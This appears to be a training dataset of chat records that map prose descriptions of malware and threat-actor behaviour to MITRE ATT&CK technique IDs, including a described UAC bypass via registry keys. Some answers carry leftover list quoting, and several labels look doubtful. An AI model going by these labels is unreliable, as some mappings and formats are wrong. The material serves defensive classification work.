- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has taken a screenshot of a victim's desktop, named it \"Filter3.jpg\", and stored it in the local directory."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When it first starts, crawls the victim's mapped drives and collects documents with the following extensions: .doc, .docx, .pdf, .ppt, .pptx, and .txt."
- },
- {
- "role": "assistant",
- "content": "T1039 - Data from Network Shared Drive"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate can download additional payloads hosted on a Discord channel."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. In contrast, with inline hooking, malware modifies the API function itself. In Figure 11, the malware FinFisher, performs IAT hooking by modifying where the CreateWindowEx points"
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can create a scheduled task for persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection', 'T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has a remote webcam monitoring capability."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has gathered system architecture, processor, OS configuration, and installed hardware information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ObliqueRAT can hide its payload in BMP images hosted on compromised websites."
- },
- {
- "role": "assistant",
- "content": "T1027.003 - Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Variants of Kevin can communicate over DNS through queries to the server for constructed domain names with embedded information."
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This activity has TTP and targeting overlap with previous activity, suspected to be APT29. The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link', 'T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader was distributed through a compromised update to a Tor client with a coin miner payload."
- },
- {
- "role": "assistant",
- "content": "T1195 - Supply Chain Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used sticky-keys to obtain unauthenticated, privileged console access."
- },
- {
- "role": "assistant",
- "content": "T1546.008 - Event Triggered Execution: Accessibility Features"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Use of the non-public PowerShell backdoor previously described by Morphisec and MalwareBytes (which we refer to as POWERSTATS)"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS has encrypted C2 traffic with RSA."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Power Loader overwrites Explorer’s Shell_TrayWnd extra window memory to redirect execution to a NTDLL function that is abused to assemble and execute a return-oriented programming (ROP) chain and create a malicious thread within Explorer.exe."
- },
- {
- "role": "assistant",
- "content": "T1055.011 - Process Injection: Extra Window Memory Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Interestingly, the server mapped to kneeexercises[.]net listens for incoming HTTPS connections on several ports and uses common names seen on other C2 domains. For example, ports 2083 and 8443 had CN firstohiobank[.]com, and TCP port 2087 had a TLS certificate with the common name dentalmatrix[.]net. We observed use of these non-standard ports during some of the older intrusions, while the newer ones mostly use port 443"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSX/Shlayer has used a resource fork to hide a compressed binary file of itself from the terminal, Finder, and potentially evade traditional scanners."
- },
- {
- "role": "assistant",
- "content": "T1564.009 - Resource Forking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 7: The same de-obfuscated code as Figure 2 The only other script content of the blog-page[.]html is an empty script section"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The data exchanged between the module and the C&C is encrypted with a proprietary algorithm and then encoded as readable latin characters"
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string “[username]=>singleton-instance-mutex”. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string “Global\\\\” to create the mutex"
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "On top of this configuration change, this sample does not use the libcurl library for network exfiltration. Instead, it uses an external library. To locate it, the backdoor tries to decrypt each file in the current directory using AES-256-CBC with the key gFjMXBgyXWULmVVVzyxy padded with zeroes. Each file is “decrypted” and saved as /tmp/store and an attempt to load it as a library made using the dlopen function. When a decryption attempt results in a successful call to dlopen, the backdoor then retrieves the exported functions Boriry and ChadylonV, which seem to be responsible for the network communication with the server. As we do not have the dropper or other files from the original sample’s location, we could not analyse this library. Moreover, since the component is encrypted, a YARA rule based on these strings would not match the file found on disk"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Registered and active during late June 2020, newspointview[.]com has been used with more recent SombRAT variants as the primary C2 domain"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attacker used a temporary file replacement technique to remotely execute utilities: they replaced a legitimate utility with theirs, executed their payload, and then restored the legitimate original file. They similarly manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returning the scheduled task to its original configuration. They routinely removed their tools, including removing backdoors once legitimate remote access was achieved"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070 - Indicator Removal on Host', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has commands to get the current user's name and SID."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Confucius has created scheduled tasks to maintain persistence on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The only known method of delivering stolen information to cybercriminals is by sending a ZIP archive to an embedded control center."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has divided files if the size is 0x1000000 bytes or more."
- },
- {
- "role": "assistant",
- "content": "T1030 - Data Transfer Size Limits"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can collect start time information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus's dropper can be packed with UPX."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon used pass-the-hash tools to gain usernames and passwords."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has encoded data as readable Latin characters."
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains application windows titles and then determines which windows to perform on."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To suppress the User Access Control (UAC) prompt that normally occurs during privilege elevation, the malware uses a UAC bypass technique first documented in August 2016. This bypass requires temporarily setting either the registry key HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command on Windows 10, or the registry key HKCU\\Software\\Classes\\mscfile\\shell\\open\\command on Windows 7 to execute the malware. Once the registry key is set, the malware launches the Windows event viewer process eventvwr.msc, which will inadvertently launch the malware set in the registry keys with elevated privileges"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For example, Monash University, located in Australia, has been a popular Silent Librarian target. Like the overall content of their lures, the subject lines of Silent Librarian phishing emails have remained consistent over time. Phishing Pages . We have identified 127 different domains used to host Silent Librarian phishing sites since 2013. Like a growing number of phishing sites, domains registered by Silent Librarian generally use Freenom top-level domains (TLDs) (.TK, . CF, .GA, .GQ, .ML) because they are available at no cost. Some of the other recent TLDs associated with Silent Librarian domains include .IN, .IR, .INFO, .LINK, and .TOP. Legitimate American University Library Login URL (above) . Silent Librarian Phishing URL (January 2018) . The content of Silent Librarian phishing pages is almost identical to the legitimate target sites. The actors likely scrape the original HTML source code from the legitimate library login page, then edit the references to resources used to render the webpage (images, JavaScript, CSS, etc. An analysis of the Silent Librarian kits identified two email accounts that were used to receive compromised victim credentials. Similarly, the credentials stolen in the Silent Librarian phishing attacks we identified were sold on an Iranian website; however, it is not one of the sites specified in the indictment. Using a combination of technical and open source research, we identified another website, Uniaccount[.]ir, that was used to sell the credentials compromised in the Silent Librarian phishing attacks"
- },
- {
- "role": "assistant",
- "content": "T1598.003 - Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian can create a remote shell and execute commands using cmd."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NotPetya can use PsExec to help propagate itself across a network."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In early April, Emotet acquired a module for distribution over wireless networks (MD5: 75d65cea0a33d11a2a74c703dbd2ad99), which tried to access Wi-Fi using a dictionary attack. Its code resembled that of the Network Spreader module (bypass.exe), which had been supplemented with Wi-Fi connection capability. If the brute-force was successful, the module transmitted data about the network to C&C."
- },
- {
- "role": "assistant",
- "content": "T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has a tool that looks for files and directories on the local file system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crutch can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Frankenstein, the threat actors used Empire to automatically gather the username, domain name, machine name, and other system information."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flame contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using Autorun functionality."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CallMe has the capability to create a reverse shell on victims."
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection."
- },
- {
- "role": "assistant",
- "content": "T1021.004 - Remote Services: SSH"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. If the victim’s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones"
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has made use of legitimate tools ConnectWise and Remote Utilities to gain access to target environment."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT-C-36 has used spearphishing emails with password protected RAR attachment to avoid being detected by the email gateway."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used ports 8060 and 8888 for C2."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Axiom has collected data from a compromised network."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Waterbear has deleted certain values from the Registry to load a malicious DLL."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Babuk has the ability to unpack itself into memory using XOR."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar downloads have been hosted on Google Docs."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StreamEx has the ability to remotely execute commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has used code-signing certificates on its malware that are either forged due to weak keys or stolen. Darkhotel has also stolen certificates and signed backdoors and downloaders with them."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tonto Team has exploited CVE-2019-0803 and MS16-032 to escalate privileges."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "shellcode decrypts and decompresses its RC4-encrypted payload."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. File listing plugin: Works on local or remote drives and can map additional paths when given credentials"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gsecdump can dump Windows password hashes from the SAM."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has attempted to get users to execute malware via social media and spearphishing emails."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Olympic Destroyer overwrites files locally and on remote shares."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Catchamas captures screenshots based on specific keywords in the window’s title."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware IndiaIndia saves information gathered about the victim to a file that is saved in the %TEMP% directory, then compressed, encrypted, and uploaded to a C2 server."
- },
- {
- "role": "assistant",
- "content": "T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The results of the decoded data may be seen below: Figure 13 Decrypted information The decrypted data contains URLs for various online services that will be used by the attacker for downloading data that will contain the command and control (C2) server(s) and port(s) to be used by Comnie"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1041 - Exfiltration Over C2 Channel', 'T1048 - Exfiltration Over Alternative Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BONDUPDATER uses \"-windowstyle hidden\" to conceal a PowerShell window that downloads a payload."
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware has communicated with its C2 server over ports 4443 and 3543."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dark Caracal has obfuscated strings in Bandook by base64 encoding, and then encrypting them."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uses BITSAdmin to download and install payloads."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
